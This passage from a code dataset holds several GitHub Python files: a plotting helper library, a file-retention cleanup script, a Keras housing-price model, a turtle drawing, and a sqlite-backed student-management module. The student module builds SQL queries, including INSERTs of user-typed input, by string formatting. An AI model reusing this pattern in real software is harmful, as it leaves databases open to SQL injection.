dns_answers = None\n        dns_error = 'Timeout'\n    except dns.resolver.YXDOMAIN:\n        # The DNS query name is too long after DNAME substitution.\n        dns_answers = None\n        dns_error = 'Name too long after DNAME substitution'\n    except Exception as ex:\n        dns_answers = None\n        dns_error = str(ex)\n    return dns_answers, dns_error\n\n\ndef dns_query_field(host: str, field: str):\n    dns_answers, dns_error = dns_query(host, field)\n    return list(map(str, dns_answers or [])), dns_error\n\n\ndef get_info(host: str):\n    result = {}\n    for field_type in ['A', 'AAAA']:\n        addresses, error = dns_query_field(host, field_type)\n        result[field_type]=(addresses, error)\n    return result\n","repo_name":"dalf/dnssecaudit","sub_path":"dnssecaudit/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"9089135073","text":"class User:\t\t# here's what we have so far\n    def __init__(self, name, email):\n        self.name = name\n        self.email = email\n        self.account_balance = 0\n    # adding the deposit method\n    def make_deposit(self, amount):\t# takes an argument that is the amount of the deposit\n    \tself.account_balance += amount\t# the spec\n\n\nguido = User('guido', 'email')\nguido.account_balance = 500\n\nguido.make_deposit(100)\nguido.make_deposit(200)\n\nprint(guido.account_balance)\t# output: 800 (500 starting balance + 100 + 200 in deposits)\n\n","repo_name":"Kevin2422/Python-flask","sub_path":"fundamentals/oop/usertest.py","file_name":"usertest.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"24842918251","text":"# V0.5\n\ntry:\n    import pandas as pd\n    import matplotlib.pyplot as plt\n    import seaborn as sns\n\nexcept ImportError:\n    raise ImportError(\n        \"quickPlots requires pandas, matplotlib, and seaborn to be installed\") from None\n\n\n
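# Usage sketch (added comment, not part of the original module): each helper\n# below styles a matplotlib figure and returns plt, so a typical call might\n# look like countplot(df, 'city', order='d', save_name='city_counts') with a\n# pandas DataFrame df you have already loaded.\ndef countplot(data1, column, x=6, y=6, palette=\"d\", xlabel_name=None, ylabel_name=None,\n              xlabel_size=16, ylabel_size=16, xticks_size=14, yticks_size=14, orientation='x',\n              hue=None, save_name=None, folder_path='Plots/', dpi=500, legend_size=5,\n              legend_loc='upper right', 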
order=None, yrange_min=None, yrange_max=None, xrange_min=None,\n xrange_max=None):\n\n with plt.style.context('seaborn-whitegrid'):\n f, ax = plt.subplots(figsize=(x, y))\n\n '''\n Order Parameter:\n\n None (default) => default behavior\n 'a' => ascending\n 'd' => descending\n '[]' => pass a list for custom order.\n '''\n\n if order == 'a':\n order = list(data1[column].value_counts(ascending=True).index)\n elif order == 'd':\n order = list(data1[column].value_counts(ascending=False).index)\n\n if orientation.lower() == 'y':\n # When hue is present, we don't want to have palette colours.\n if hue == None:\n p1 = sns.countplot(y=column, data=data1, palette=(\n 'Blues_'+palette), order=order)\n else:\n p1 = sns.countplot(y=column, data=data1, hue=hue, order=order)\n\n plt.xlabel(xlabel_name or 'Count', size=xlabel_size)\n plt.ylabel(ylabel_name or column.title(), size=ylabel_size)\n else:\n if hue == None:\n p1 = sns.countplot(x=column, data=data1, palette=(\n 'Blues_'+palette), order=order)\n else:\n p1 = sns.countplot(x=column, data=data1, hue=hue, order=order)\n\n plt.xlabel(xlabel_name or column.title(), size=xlabel_size)\n plt.ylabel(ylabel_name or 'Count', size=ylabel_size)\n\n if hue != None:\n ax.legend(data1[column].unique(), loc=legend_loc,\n prop={'size': legend_size})\n\n plt.xticks(size=xticks_size)\n plt.yticks(size=yticks_size)\n\n if xrange_min != None:\n plt.xlim(xrange_min, xrange_max)\n\n if yrange_min != None:\n plt.ylim(yrange_min, yrange_max)\n\n # UNDER CONSTRUCTION:\n # Adding % on the top of the bars. Doesn't work when orientation== 'y'.\n #total = len(data1[column])\n # for p in ax.patches:\n #percentage = '{:.1f}%'.format(100 * p.get_height()/total)\n\n #x = p.get_x() + p.get_width() / 2 - 0.05\n #y = p.get_y() + p.get_height()\n #ax.annotate(percentage, (x, y), size = 12)\n\n if save_name != None:\n f.savefig(folder_path + save_name + '.png',\n dpi=dpi, bbox_inches='tight')\n\n return plt\n\n\ndef pie(data1, column, size=5, exp=None, legend=True, legend_loc='upper right', font_size=14, col_name=None,\n col_size=15, get_colors=False, colors_custom=None, save_name=None, folder_path='Plots/', dpi=500):\n\n # Issue: Fix the current limitation of n categories, here 10. 
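The countplot helper above wraps seaborn's countplot with an order switch ('a' ascending, 'd' descending, or an explicit category list). A minimal usage sketch against a hypothetical DataFrame; note the helper's 'seaborn-whitegrid' style context assumes a matplotlib old enough to still ship that alias (matplotlib 3.6 renamed it 'seaborn-v0_8-whitegrid'):

import pandas as pd
from quickPlots import countplot

# Hypothetical data: one categorical column to count.
df = pd.DataFrame({"city": ["Oslo", "Oslo", "Bergen", "Trondheim", "Bergen", "Oslo"]})

# Horizontal bars in descending count order; saving assumes the default
# Plots/ folder already exists on disk.
plot = countplot(df, "city", orientation="y", order="d", save_name="city_counts")
plot.show()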
The code fails when there are more than n categories.\n colors = ['#0fbcf9', '#ffc048', '#00d8d6', '#ef5777', '#05c46b',\n '#fa8231', '#fc5c65', '#fed330', '#26de81', '#45aaf2']\n # We can get the existing color codes to control which category gets which color.\n if get_colors == True:\n return colors\n\n with plt.style.context('default'):\n f, ax = plt.subplots(figsize=(size, size))\n\n default_exp = (0.02,)\n col_categories_count = data1[column].nunique()\n explode = exp or default_exp * col_categories_count # to break the pie\n labels = data1[column].unique()\n\n data1[column].value_counts().plot(kind='pie', autopct='%1.1f%%', textprops={'fontsize': font_size},\n colors=colors_custom or colors, explode=explode)\n\n if legend == True:\n ax.legend(labels, loc=legend_loc)\n\n if col_name == None:\n plt.xlabel('')\n plt.ylabel('')\n else:\n plt.ylabel(col_name, size=col_size)\n\n if save_name != None:\n f.savefig(folder_path + save_name + '.png',\n dpi=dpi, bbox_inches='tight')\n\n return plt\n\n\ndef hist(data1, column, bins=None, bin_size=1, edgecolor='black', median_axvline=False,\n median_name_axvline='Median', median_color_axvline='#fc4f30', mean_axvline=False,\n mean_name_axvline='Average', mean_color_axvline='#EAB543', x=10, y=6, save_name=None, legend_size=12,\n folder_path='Plots/', dpi=500, yrange_min=None, yrange_max=None, xrange_min=None, xrange_max=None,\n xlabel_name=None, ylabel_name=None, xlabel_size=16, ylabel_size=16):\n\n with plt.style.context('seaborn-whitegrid'):\n f, ax = plt.subplots(figsize=(x, y))\n\n col = data1[column]\n bins = bins or list(range(col.min(), col.max() + 1, bin_size))\n\n plt.hist(col, bins=bins, edgecolor=edgecolor)\n #sns.distplot(col, bins= bins, hist_kws=dict(edgecolor= edgecolor, linewidth=2));\n if median_axvline == True:\n plt.axvline(col.median(), color=median_color_axvline,\n label=median_name_axvline)\n plt.legend()\n\n if mean_axvline == True:\n plt.axvline(col.mean(), color=mean_color_axvline,\n label=mean_name_axvline)\n plt.legend()\n\n ax.legend(prop={'size': legend_size})\n\n if xrange_min != None:\n plt.xlim(xrange_min, xrange_max)\n\n if yrange_min != None:\n plt.ylim(yrange_min, yrange_max)\n\n plt.xlabel(xlabel_name or column.title(), size=xlabel_size)\n plt.ylabel(ylabel_name or 'Count', size=ylabel_size)\n\n if save_name != None:\n f.savefig(folder_path + save_name + '.png',\n dpi=dpi, bbox_inches='tight')\n\n return plt\n\n\ndef heat(data1, x_col=None, y_col=None, type='%', x=6, y=6, xlabel_name=None, xlabel_size=14,\n ylabel_name=None, ylabel_size=14, xticks_size=12, yticks_size=12, save_name=None,\n dpi=500, folder_path='Plots/'):\n\n pivot = pd.pivot_table(data1, index=[y_col], columns=[\n x_col], aggfunc='count', fill_value=0)\n temp = list(data1)\n temp.remove(x_col)\n temp.remove(y_col)\n pivot = pivot[temp[1]]\n\n if type == '%':\n tot_cols = len(data1)\n for col in data1[x_col].unique():\n pivot[col] = pivot[col].apply(lambda x: (x/tot_cols)*100)\n\n with plt.style.context('default'):\n f, ax = plt.subplots(figsize=(x, y))\n\n # Generate a custom diverging colormap\n cmap = sns.color_palette(\"Blues\")\n\n # Draw the heatmap with the mask and correct aspect ratio\n if type == '%':\n ax = sns.heatmap(pivot, cmap=cmap, annot=True,\n fmt='.1f', linewidth=2, square=True)\n else:\n ax = sns.heatmap(pivot, cmap=cmap, annot=True,\n fmt='d', linewidth=2, square=True)\n\n plt.xlabel(xlabel_name or x_col, fontsize=xlabel_size)\n plt.ylabel(ylabel_name or y_col, fontsize=ylabel_size)\n plt.xticks(fontsize=xticks_size, 
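The pie helper above carries a TODO about its hard-coded ten-colour list failing past ten categories. One way to lift the limit, hedged as a sketch, is to sample however many colours are needed from a matplotlib colormap and feed them through the existing colors_custom parameter:

import matplotlib.pyplot as plt

def n_colors(n, cmap_name="tab20"):
    # Sample n evenly spaced colours from a named colormap, so the palette
    # grows with the category count instead of capping at 10.
    cmap = plt.get_cmap(cmap_name)
    return [cmap(i / max(n - 1, 1)) for i in range(n)]

# e.g. pie(df, "category", colors_custom=n_colors(df["category"].nunique()))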
va=\"center\")\n plt.yticks(fontsize=yticks_size, va=\"center\", rotation=0)\n\n if type == '%':\n for t in ax.texts:\n t.set_text(t.get_text() + \" %\")\n\n if save_name != None:\n f.savefig(folder_path + save_name + '.png',\n dpi=dpi, bbox_inches='tight')\n\n return plt\n\n# Boxplot & Violin plot\ndef bv(data1, cat_col=None, num_col=None, type='b', x=10, y=8, xlabel_name=None, xlabel_size=16,\n ylabel_name=None, ylabel_size=16, xticks_size=14, yticks_size=14, multicol_melt=False,\n save_name=None, dpi=500, folder_path='Plots/', yrange_min=0, yrange_max=None, xrange_min=0,\n xrange_max=None, xinterval=None, yinterval=None):\n\n with plt.style.context('seaborn-whitegrid'):\n f, ax = plt.subplots(figsize=(x, y))\n\n # For multicol_melt, x and y parameters are mandatory. They consist of label names\n if multicol_melt == True:\n data1 = pd.melt(data1)\n data1.columns = [cat_col, num_col]\n\n if type == 'b':\n p1 = sns.boxplot(x=cat_col, y=num_col, data=data1)\n else:\n p1 = sns.violinplot(x=cat_col, y=num_col, data=data1)\n\n if xrange_max != None:\n plt.xlim(xrange_min, xrange_max)\n\n if yrange_max != None:\n plt.ylim(yrange_min, yrange_max)\n\n # setting interval of ticks\n\n # ALTERT: No interval for cat col. It is only for events where x is also a num col.\n if xinterval != None:\n p1.set(xticks=[i for i in range(xrange_min, int(\n xrange_max or max(data[cat_col])) + 1, xinterval)])\n if yinterval != None:\n p1.set(yticks=[i for i in range(yrange_min, int(\n yrange_max or max(data[num_col])) + 1, yinterval)])\n\n return commons(plt, cat_col, num_col, xlabel_name, ylabel_name, xlabel_size, ylabel_size, xticks_size,\n yticks_size, save_name, dpi, folder_path)\n\n\ndef rel(data1, x_col, y_col, xlabel_name=None, xlabel_size=16, ylabel_name=None, ylabel_size=16,\n xticks_size=14, yticks_size=14, save_name=None, dpi=500, folder_path='Plots/',\n height=6, aspect=1, ci=None, kind='line', hue=None, legend=\"brief\", yrange_min=0,\n yrange_max=None, xrange_min=0, xrange_max=None, xinterval=None, yinterval=None):\n '''\n # Legend => \"brief\", \"full\", or False\n # Ci => either a percentage number such as 36.2, 95 etc. 
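The interval-setting branches in bv above (and the same pattern in rel and bar further on) reference a bare name `data`, while the functions only receive `data1`, so using xinterval/yinterval without an explicit range maximum raises NameError. A corrected standalone version of that tick logic, as a sketch:

def tick_range(lo, hi_param, series, step):
    # Fall back to the column maximum when no explicit upper bound is given;
    # the original code referenced the undefined name `data` at this point.
    hi = int(hi_param if hi_param is not None else series.max())
    return list(range(lo, hi + 1, step))

# e.g. inside bv(): p1.set(xticks=tick_range(xrange_min, xrange_max, data1[cat_col], xinterval))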
or 'sd' (Standard Deviation) or None\n # kind => 'scatter', 'line'\n '''\n\n p1 = None\n with plt.style.context('seaborn-whitegrid'):\n p1 = sns.relplot(x=x_col, y=y_col, data=data1, kind=kind,\n ci=ci, hue=hue, height=height, aspect=aspect)\n\n # Setting range of ticks (without interval specification)\n if xrange_max != None and xinterval == None:\n plt.xlim(xrange_min, xrange_max)\n\n if yrange_max != None and yinterval == None:\n plt.ylim(yrange_min, yrange_max)\n\n # setting interval of ticks\n if xinterval != None:\n p1.set(xticks=[i for i in range(xrange_min, int(\n xrange_max or max(data[x_col])) + 1, xinterval)])\n if yinterval != None:\n p1.set(yticks=[i for i in range(yrange_min, int(\n yrange_max or max(data[y_col])) + 1, yinterval)])\n\n y_col = 'Average ' + y_col\n\n return commons(plt, x_col, y_col, xlabel_name, ylabel_name, xlabel_size, ylabel_size, xticks_size, yticks_size,\n save_name, dpi, folder_path)\n\n\ndef bar(data1, cat_col, num_col, agg='mean', x=6, y=6, xlabel_name=None, xlabel_size=16,\n ylabel_name=None, ylabel_size=16, xticks_size=14, yticks_size=14, yrange_min=0, yrange_max=None,\n yinterval=None, save_name=None, dpi=500, folder_path='Plots/', order=None):\n\n temp = data1.groupby(by=cat_col)[num_col].agg([agg])\n temp = temp.reset_index()\n temp.columns = [cat_col, num_col]\n\n with plt.style.context('seaborn-whitegrid'):\n f, ax = plt.subplots(figsize=(x, y))\n\n if order == None:\n p1 = sns.barplot(x=cat_col, y=num_col, data=temp,\n palette=('Blues_'+'d'))\n else:\n odr = False if order == 'd' else True\n temp.sort_values(by=num_col, ascending=odr, inplace=True)\n temp.reset_index(drop=True, inplace=True)\n p1 = sns.barplot(x=cat_col, y=num_col, data=temp, palette=(\n 'Blues_'+'d'), order=temp[cat_col].values)\n\n temp[num_col].plot(zorder=2, color='red')\n\n import math\n if yrange_min != 0 or yrange_max != None:\n plt.ylim(yrange_min, yrange_max or math.ceil(\n max(temp[num_col]) + temp[num_col].std()))\n\n if yinterval != None:\n p1.set(yticks=[i for i in range(yrange_min, int(\n yrange_max or max(data[num_col])) + 1, yinterval)])\n\n # Note: Impacted by order\n for index, row in temp.iterrows():\n p1.text(row.name, row[num_col], round(\n row[num_col], 2), color='black', ha=\"center\")\n\n if agg == 'mean':\n agg = 'average'\n num_col = agg+' '+num_col\n\n return commons(plt, cat_col, num_col, xlabel_name, ylabel_name, xlabel_size, ylabel_size, xticks_size,\n yticks_size, save_name, dpi, folder_path)\n\n\ndef commons(plt, x_col, y_col, xlabel_name, ylabel_name, xlabel_size, ylabel_size, xticks_size, yticks_size,\n save_name, dpi, folder_path):\n\n plt.xlabel(xlabel_name or x_col.title(), fontsize=xlabel_size)\n plt.ylabel(ylabel_name or y_col.title(), fontsize=ylabel_size)\n plt.xticks(fontsize=xticks_size)\n plt.yticks(fontsize=yticks_size, rotation=0)\n\n if save_name != None:\n plt.savefig(folder_path + save_name + '.png',\n dpi=dpi, bbox_inches='tight')\n\n return plt\n","repo_name":"Abhilash-Korraprolu/aklib","sub_path":"quickPlots.py","file_name":"quickPlots.py","file_ext":"py","file_size_in_byte":12635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"73390187408","text":"import os\nimport datetime\nfrom xml.etree import ElementTree\n\ndef checkFiles(catalogue, wholesalerName):\n os.chdir(os.path.join(catalogue, wholesalerName, 'Connection_register'))\n for filename in os.listdir():\n if (filename.startswith('NAPS_') and filename.endswith('.txt') and \"00_G\" not in filename):\n if 
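The rel helper above forwards its ci argument straight to seaborn's relplot; seaborn 0.12 deprecated ci in favour of errorbar, so on newer installs the same intent is spelled differently. A sketch assuming seaborn >= 0.12, using seaborn's bundled example dataset:

import seaborn as sns

tips = sns.load_dataset("tips")

# Mapping from the old parameter: ci=None -> errorbar=None,
# ci='sd' -> errorbar='sd', ci=95 -> errorbar=('ci', 95).
grid = sns.relplot(data=tips, x="total_bill", y="tip", kind="line", errorbar=("ci", 95))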
(DateToHelpDeleter - int(filename[-14:-6]) > finalDailyRet):\n deleteFile(filename)\n elif (filename.startswith('NAPS_') and filename.endswith('.txt') and \"00_G\" in filename):\n if (DateToHelpDeleter - int(filename[-14:-6]) > finalMonthlyRet):\n deleteFile(filename)\n\ndef deleteFile(fileToDelete):\n logFile.write('Delete: ' + fileToDelete + '\\n')\n os.unlink(fileToDelete)\n\n\n############ main Program ############\n\nftpRootCatalogue = 'C:\\\\Users\\\\przemyslaw.lelewski\\\\Documents\\\\CCC' #ZMIEN SCIEZKE DLA PLIKOW\nlogArchive_file = 'archive_log.txt'\nfile_name = \"Data.xml\"\nwslNames = []\n\n# create/open or open the log file\nif (os.path.isfile(logArchive_file)) == False:\n logFile = open(logArchive_file, 'w')\nelse:\n logFile = open(logArchive_file, 'a')\n\n# get system_datetime and write to log file\nDateToHelpDeleter = int(datetime.datetime.now().strftime(\"%Y%m%d\"))\nnow = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\nlogFile.write('------ Start ' + str(now) + '\\n')\n\n# parse xml config file\ndom = ElementTree.parse(file_name)\nwslTree = dom.findall(\"Wholesaler\")\nretTree = dom.findall(\"Retension\")\n\n# find all Wholesalers in the config file\nfor wTree in wslTree:\n wsls = wTree.findall(\"wsl\")\n for wsl in wsls:\n finalWslName = wsl.text\n wslNames.append(finalWslName)\n\n# find how many rete in the config file\nfor rTree in retTree:\n rT = rTree.findall(\"daily\")\n for ff in rT:\n finalDailyRet = int(ff.text)\n tR = rTree.findall(\"monthly\")\n for hh in tR:\n finalMonthlyRet = int(hh.text)\n\n# run check/delete files according to the parameters\nfor wslName in wslNames:\n checkFiles(ftpRootCatalogue, wslName)\n\nlogFile.write('------ End' + '\\n\\n')\nlogFile.close()","repo_name":"plelewski/Others","sub_path":"FilesDeleter/Program.py","file_name":"Program.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"75024750927","text":"#!/usr/bin/env python3\n\n__author__ = \"Yxzh\"\n\nimport numpy as np\nfrom tensorflow import keras\nimport pandas as pd\n\n\ncsv_loader = pd.read_csv(\"data/housing.csv\", delim_whitespace = True, header = None)\nsamples = np.array(csv_loader)[:, 0: 13]\nlabels = np.array(csv_loader)[:, 13: 14]\n\nprint(samples, labels)\nmodel = keras.Sequential()\nmodel.add(keras.layers.Dense(13, input_dim = 13, kernel_initializer = 'normal', activation = 'relu'))\nmodel.add(keras.layers.Dense(7, kernel_initializer = 'normal', activation = 'relu'))\nmodel.add(keras.layers.Dense(3, kernel_initializer = 'normal', activation = 'relu'))\nmodel.add(keras.layers.Dense(1, kernel_initializer = 'normal'))\nmodel.compile(loss = 'mean_squared_error', optimizer = 'adam')\n\nmodel.fit(samples, labels, 4, epochs = 200)\n\nmodel.save(\"model/housing.h5\")\n\nprint(\n\tmodel.predict(np.array([[0.00632, 18.00, 2.310, 0, 0.5380, 6.5750, 65.20, 4.0900, 1, 296.0, 15.30, 396.90, 4.98]])))\nprint(\n\tmodel.predict(np.array([[0.02731, 0.00, 7.070, 0, 0.4690, 6.4210, 78.90, 4.9671, 2, 242.0, 17.80, 396.90, 9.14]])))\nprint(\n\tmodel.predict(np.array([[0.02729, 0.00, 7.070, 0, 0.4690, 7.1850, 61.10, 4.9671, 2, 242.0, 17.80, 392.83, 4.03]]))\n)\n","repo_name":"cstrikest/ML_study","sub_path":"House_Price_keras.py","file_name":"House_Price_keras.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"65"} +{"seq_id":"6261022402","text":"# a115_buggy_image.py\r\nimport turtle as 
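The retention check in FilesDeleter/Program.py above compares YYYYMMDD stamps as plain integers (DateToHelpDeleter - int(filename[-14:-6])), which only approximates an age in days: across month or year boundaries the difference jumps (20240101 - 20231231 = 8870, not 1). A sketch of the same test done with real dates, assuming the configured retention values are meant as day counts:

import datetime

def older_than(filename, retention_days, today=None):
    # Parse the YYYYMMDD stamp embedded in the filename (positions -14:-6,
    # matching the original slicing) and compare actual calendar dates.
    today = today or datetime.date.today()
    stamp = datetime.datetime.strptime(filename[-14:-6], "%Y%m%d").date()
    return (today - stamp).days > retention_days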
trtl\r\n\r\nspider = trtl.Turtle()\r\n# create spider head + body\r\nspider.pensize(40)\r\nspider.circle(20)\r\n# configure spider legs\r\nlegs = 8\r\nlength_legs = 80\r\nspider_angle = 360 / legs \r\nspider.pensize(5)\r\nlegs_loop = 0\r\n# draw spider legs\r\nwhile (legs_loop < legs):\r\n spider.goto(0,20)\r\n spider.setheading(spider_angle*legs_loop)\r\n spider.forward(length_legs)\r\n legs_loop = legs_loop + 1\r\nspider.up()\r\nspider.goto (0,60)\r\nspider.down()\r\nspider.begin_fill()\r\nspider.circle(20)\r\nspider.end_fill()\r\n\r\n\r\n\r\nspider.hideturtle()\r\nwn = trtl.Screen()\r\nwn.mainloop()","repo_name":"riley-csp-2019-20/1-1-5-buggy-code-mileswieczorek","sub_path":"115MilesWieczorek.py","file_name":"115MilesWieczorek.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"20644506130","text":"import ui\nimport assignment\nimport submission\nimport datetime\nimport attendance\nimport sqlite3\n\n\nclass User:\n \"\"\"\n Base class creates user object\n\n Args:\n name: check_if_correct(name, str)\n surname: check_if_correct(surname, str)\n check_gender: gender\n gender: gender\n date_validate: birth_date\n birth_date: birth_date\n email:\n login:login\n password: check_if_correct(password, str)\n \"\"\"\n def __init__(self, _id, name, surname, gender, birth_date, email, login, password):\n \"\"\"\n Initialize user object\n\n Args:\n name: check_if_correct(name, str)\n surname: check_if_correct(surname, str)\n check_gender: gender\n gender: gender\n date_validate: birth_date\n birth_date: birth_date\n email:\n login:login\n password: check_if_correct(password, str)\n \"\"\"\n self._id = _id\n self.name = self.check_if_correct(name, str)\n self.surname = self.check_if_correct(surname, str)\n self.check_gender(gender)\n self.gender = gender\n self.date_validate(birth_date)\n self.birth_date = birth_date\n self.email = email\n self.login = login\n self.password = self.check_if_correct(password, str)\n\n @staticmethod\n def check_if_correct(validate, check_type):\n \"\"\"\n Checks if variable is expected type and convert it to integer type if it contains just digits\n\n Args:\n validate: variable to check\n check_type: expected type of variable\n\n Returns:\n validated variable\n \"\"\"\n if type(validate) != check_type:\n raise TypeError(\"Wrong format for: \" + str(validate))\n elif type(validate) == check_type:\n if validate.isdigit():\n validate = int(validate)\n return validate\n elif all(i.isalpha() or i.isspace() for i in validate):\n return validate\n else:\n raise TypeError(\"Wrong format for: \" + str(validate))\n\n def check_gender(self, gender):\n \"\"\"\n Checks if variable is correct type of gender, if not - it raises an error\n\n Args:\n gender: variable to check\n\n Returns:\n None\n \"\"\"\n gender_list = ['male', 'female', 'not sure']\n if gender.lower() not in gender_list:\n raise NameError('Gender should be: male, female, not sure')\n\n def date_validate(self, birth_date):\n \"\"\"\n Checks if data format is correct\n\n Args:\n birth_date: variable to check\n\n Returns:\n True if data format is correct\n \"\"\"\n if datetime.datetime.strptime(birth_date, '%Y-%m-%d').strftime('%Y-%m-%d'):\n return True\n\n\nclass Employee(User):\n \"\"\"Class creates object employee\"\"\"\n def __init__(self, _id, name, surname, gender, birth_date, email, login, password):\n \"\"\"\n Initialize employee object that inherits from User class\n\n Args:\n name: check_if_correct(name, 
str)\n surname: check_if_correct(surname, str)\n check_gender: gender\n gender: gender\n date_validate: birth_date\n birth_date: birth_date\n email:\n login:login\n password: check_if_correct(password, str)\n \"\"\"\n super().__init__(_id, name, surname, gender, birth_date, email, login, password)\n\n def list_students(self):\n \"\"\"\n Return student list to display\n\n Returns:\n student list\n \"\"\"\n student_list = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM `User` WHERE User_type='student'\")\n students = cursor.fetchall()\n n = 1\n for student in students:\n student_list.append([str(n) + \".\", student[1], student[2]])\n n += 1\n data.close()\n return student_list\n\n\n def list_students_simple_view(self):\n \"\"\"\n Return student list to display\n\n Returns:\n student list\n \"\"\"\n student_list = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM `User` WHERE User_type='student'\")\n students = cursor.fetchall()\n for student in students:\n student_list.append([student[0], student[1], student[2]])\n data.close()\n return student_list\n\n def view_student_details(self):\n \"\"\"\n Returns students details list to display\n\n Returns:\n\n student detail list\n \"\"\"\n\n student_list = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT * FROM `User` WHERE User_type='student'\")\n students = cursor.fetchall()\n n = 1\n for student in students:\n student_list.append([str(n) + \".\", student[1], student[2], student[3],\n student[4], student[5], student[6], student[7]])\n n += 1\n data.close()\n return student_list\n\n\nclass Student(User):\n \"\"\"Class creates object student\"\"\"\n def __init__(self, _id, name, surname, gender, birth_date, email, login, password):\n \"\"\"\n Initialize student object that inherits from User class\n\n Args:\n name: check_if_correct(name, str)\n surname: check_if_correct(surname, str)\n check_gender: gender\n gender: gender\n date_validate: birth_date\n birth_date: birth_date\n email:\n login:login\n password: check_if_correct(password, str)\n \"\"\"\n super().__init__(_id, name, surname, gender, birth_date, email, login, password)\n self.my_submissions_list = []\n\n def __str__(self):\n return self.name+self.surname\n\n def view_my_grades(self):\n \"\"\"\n Method display list of submitted assignment with grades\n\n Return:\n table submitted assignment with grades\n\n \"\"\"\n grades_for_view = []\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT assignment.name, submission.grade FROM assignment INNER JOIN submission \"\n \"ON submission.ID_assignment = assignment.ID WHERE ID_Student='{}'\".format(self._id))\n grades = cursor.fetchall()\n n = 1\n for grade in grades:\n grades_for_view.append([str(n) + \".\", grade[0], grade[1]])\n n += 1\n data.commit()\n data.close()\n return grades_for_view\n\n def list_submissions(self): #to refactor - move to class submission as class method\n \"\"\"\n Method returns list of all student submission\n\n Return:\n list submitted assignment\n\n \"\"\"\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"select ID_Assignment from `Submission` WHERE ID_Student='{}'\".format(self._id))\n submissions = cursor.fetchall()\n submissions_list = []\n for element in submissions:\n submissions_list.append(element[0])\n data.close()\n return submissions_list\n\n def list_assignments_to_submit(self): #to 
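The listing methods in user.py above repeat the connect/cursor/fetch/close dance by hand, and several read-only methods later in the module even commit() after a SELECT. sqlite3 connections work as context managers (committing or rolling back on exit), which shortens the pattern; a sketch reusing the table and column names from the queries above:

import sqlite3
from contextlib import closing

def list_students(db_path="program.db"):
    # closing() guarantees the connection is closed; the connection's own
    # context manager only commits/rolls back, it does not close.
    with closing(sqlite3.connect(db_path)) as data:
        rows = data.execute(
            "SELECT id, name, surname FROM User WHERE User_type='student'"
        ).fetchall()
    return [[f"{n}.", name, surname] for n, (_id, name, surname) in enumerate(rows, 1)]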
refactor - move to class submission as class method\n \"\"\"\n Method returns list of all student submission\n\n Return:\n list not submitted assignment\n\n \"\"\"\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT ID, Name, Type, Delivery_date FROM `Assignment`\")\n assignments = cursor.fetchall()\n assignments_to_submit = []\n for assignment in assignments:\n if assignment[0] not in self.list_submissions():\n assignments_to_submit.append(list(assignment))\n data.close()\n return assignments_to_submit\n\n def submit_assignment(self, assignment):\n \"\"\"\n Method allows student to submit assignment\n\n Args:\n assignment\n\n \"\"\"\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n if len(assignment) <= 1:\n print(\"You have no assignment to submitt!\")\n return\n assignment_id = ui.Ui.get_inputs([\"\"], \"Enter number to choose assignment to submit: \")\n # if assignment_id not in assignment or assignment_id <= 0:\n # print(\"Try again with right index!\")\n # return\n result = ui.Ui.get_inputs([\"Content\"], \"Provide information about new assignment\")\n submission_date = datetime.date.today()\n cursor.execute(\"INSERT INTO `Submission` (`ID_Student`, `ID_Assignment`,`Result`, `Submittion_date`) \"\n \"VALUES ('{}', '{}', '{}', '{}')\".format(self._id, assignment_id[0], result[0], submission_date))\n data.commit()\n data.close()\n\n def list_group_assignment(self):\n \"\"\"\n Method returns list of all group submission\n\n Return:\n list assignment for group\n\n \"\"\"\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT ID, Name, Type, Delivery_date FROM `Assignment` WHERE Type='group'\")\n group_assignments = cursor.fetchall()\n group_assignments_list = []\n for assignment in group_assignments:\n group_assignments_list.append([assignment[0], assignment[1], assignment[2], assignment[3]])\n data.commit()\n data.close()\n return group_assignments_list\n\n def find_student_team(self):\n \"\"\"\n Method returns team name for logged student\n\n Return:\n team name as list\n\n \"\"\"\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT team_name FROM `Teams` WHERE ID_Student='{}'\".format(self._id))\n teams = cursor.fetchall()\n data.commit()\n data.close()\n return teams[0][0]\n\n def find_students_teammates(self, team):\n \"\"\"\n Method returns all students from the same team\n\n Return:\n list student teammates\n\n \"\"\"\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n cursor.execute(\"SELECT Id_Student FROM `Teams` WHERE Team_name='{}'\".format(team))\n teammates = cursor.fetchall()\n teammates_list = []\n for mate in teammates:\n teammates_list.append(mate[0])\n data.commit()\n data.close()\n return teammates_list\n\n def add_group_assignment(self, teammates, group_submission):\n \"\"\"\n Method allows student to submit assignment for each team member\n\n Args:\n teammates, group_submission\n\n \"\"\"\n data = sqlite3.connect(\"program.db\")\n cursor = data.cursor()\n if len(group_submission) <= 1:\n print(\"You have no assignment to submitt!\")\n return\n assignment_id = ui.Ui.get_inputs([\"\"], \"Enter number to choose assignment to submit: \")\n result = ui.Ui.get_inputs([\"Content\"], \"Provide information about new assignment\")\n submission_date = datetime.date.today()\n for row in teammates:\n cursor.execute(\"INSERT INTO `Submission` (`ID_Student`, `ID_Assignment`,`Result`, `Submittion_date`) \"\n \"VALUES 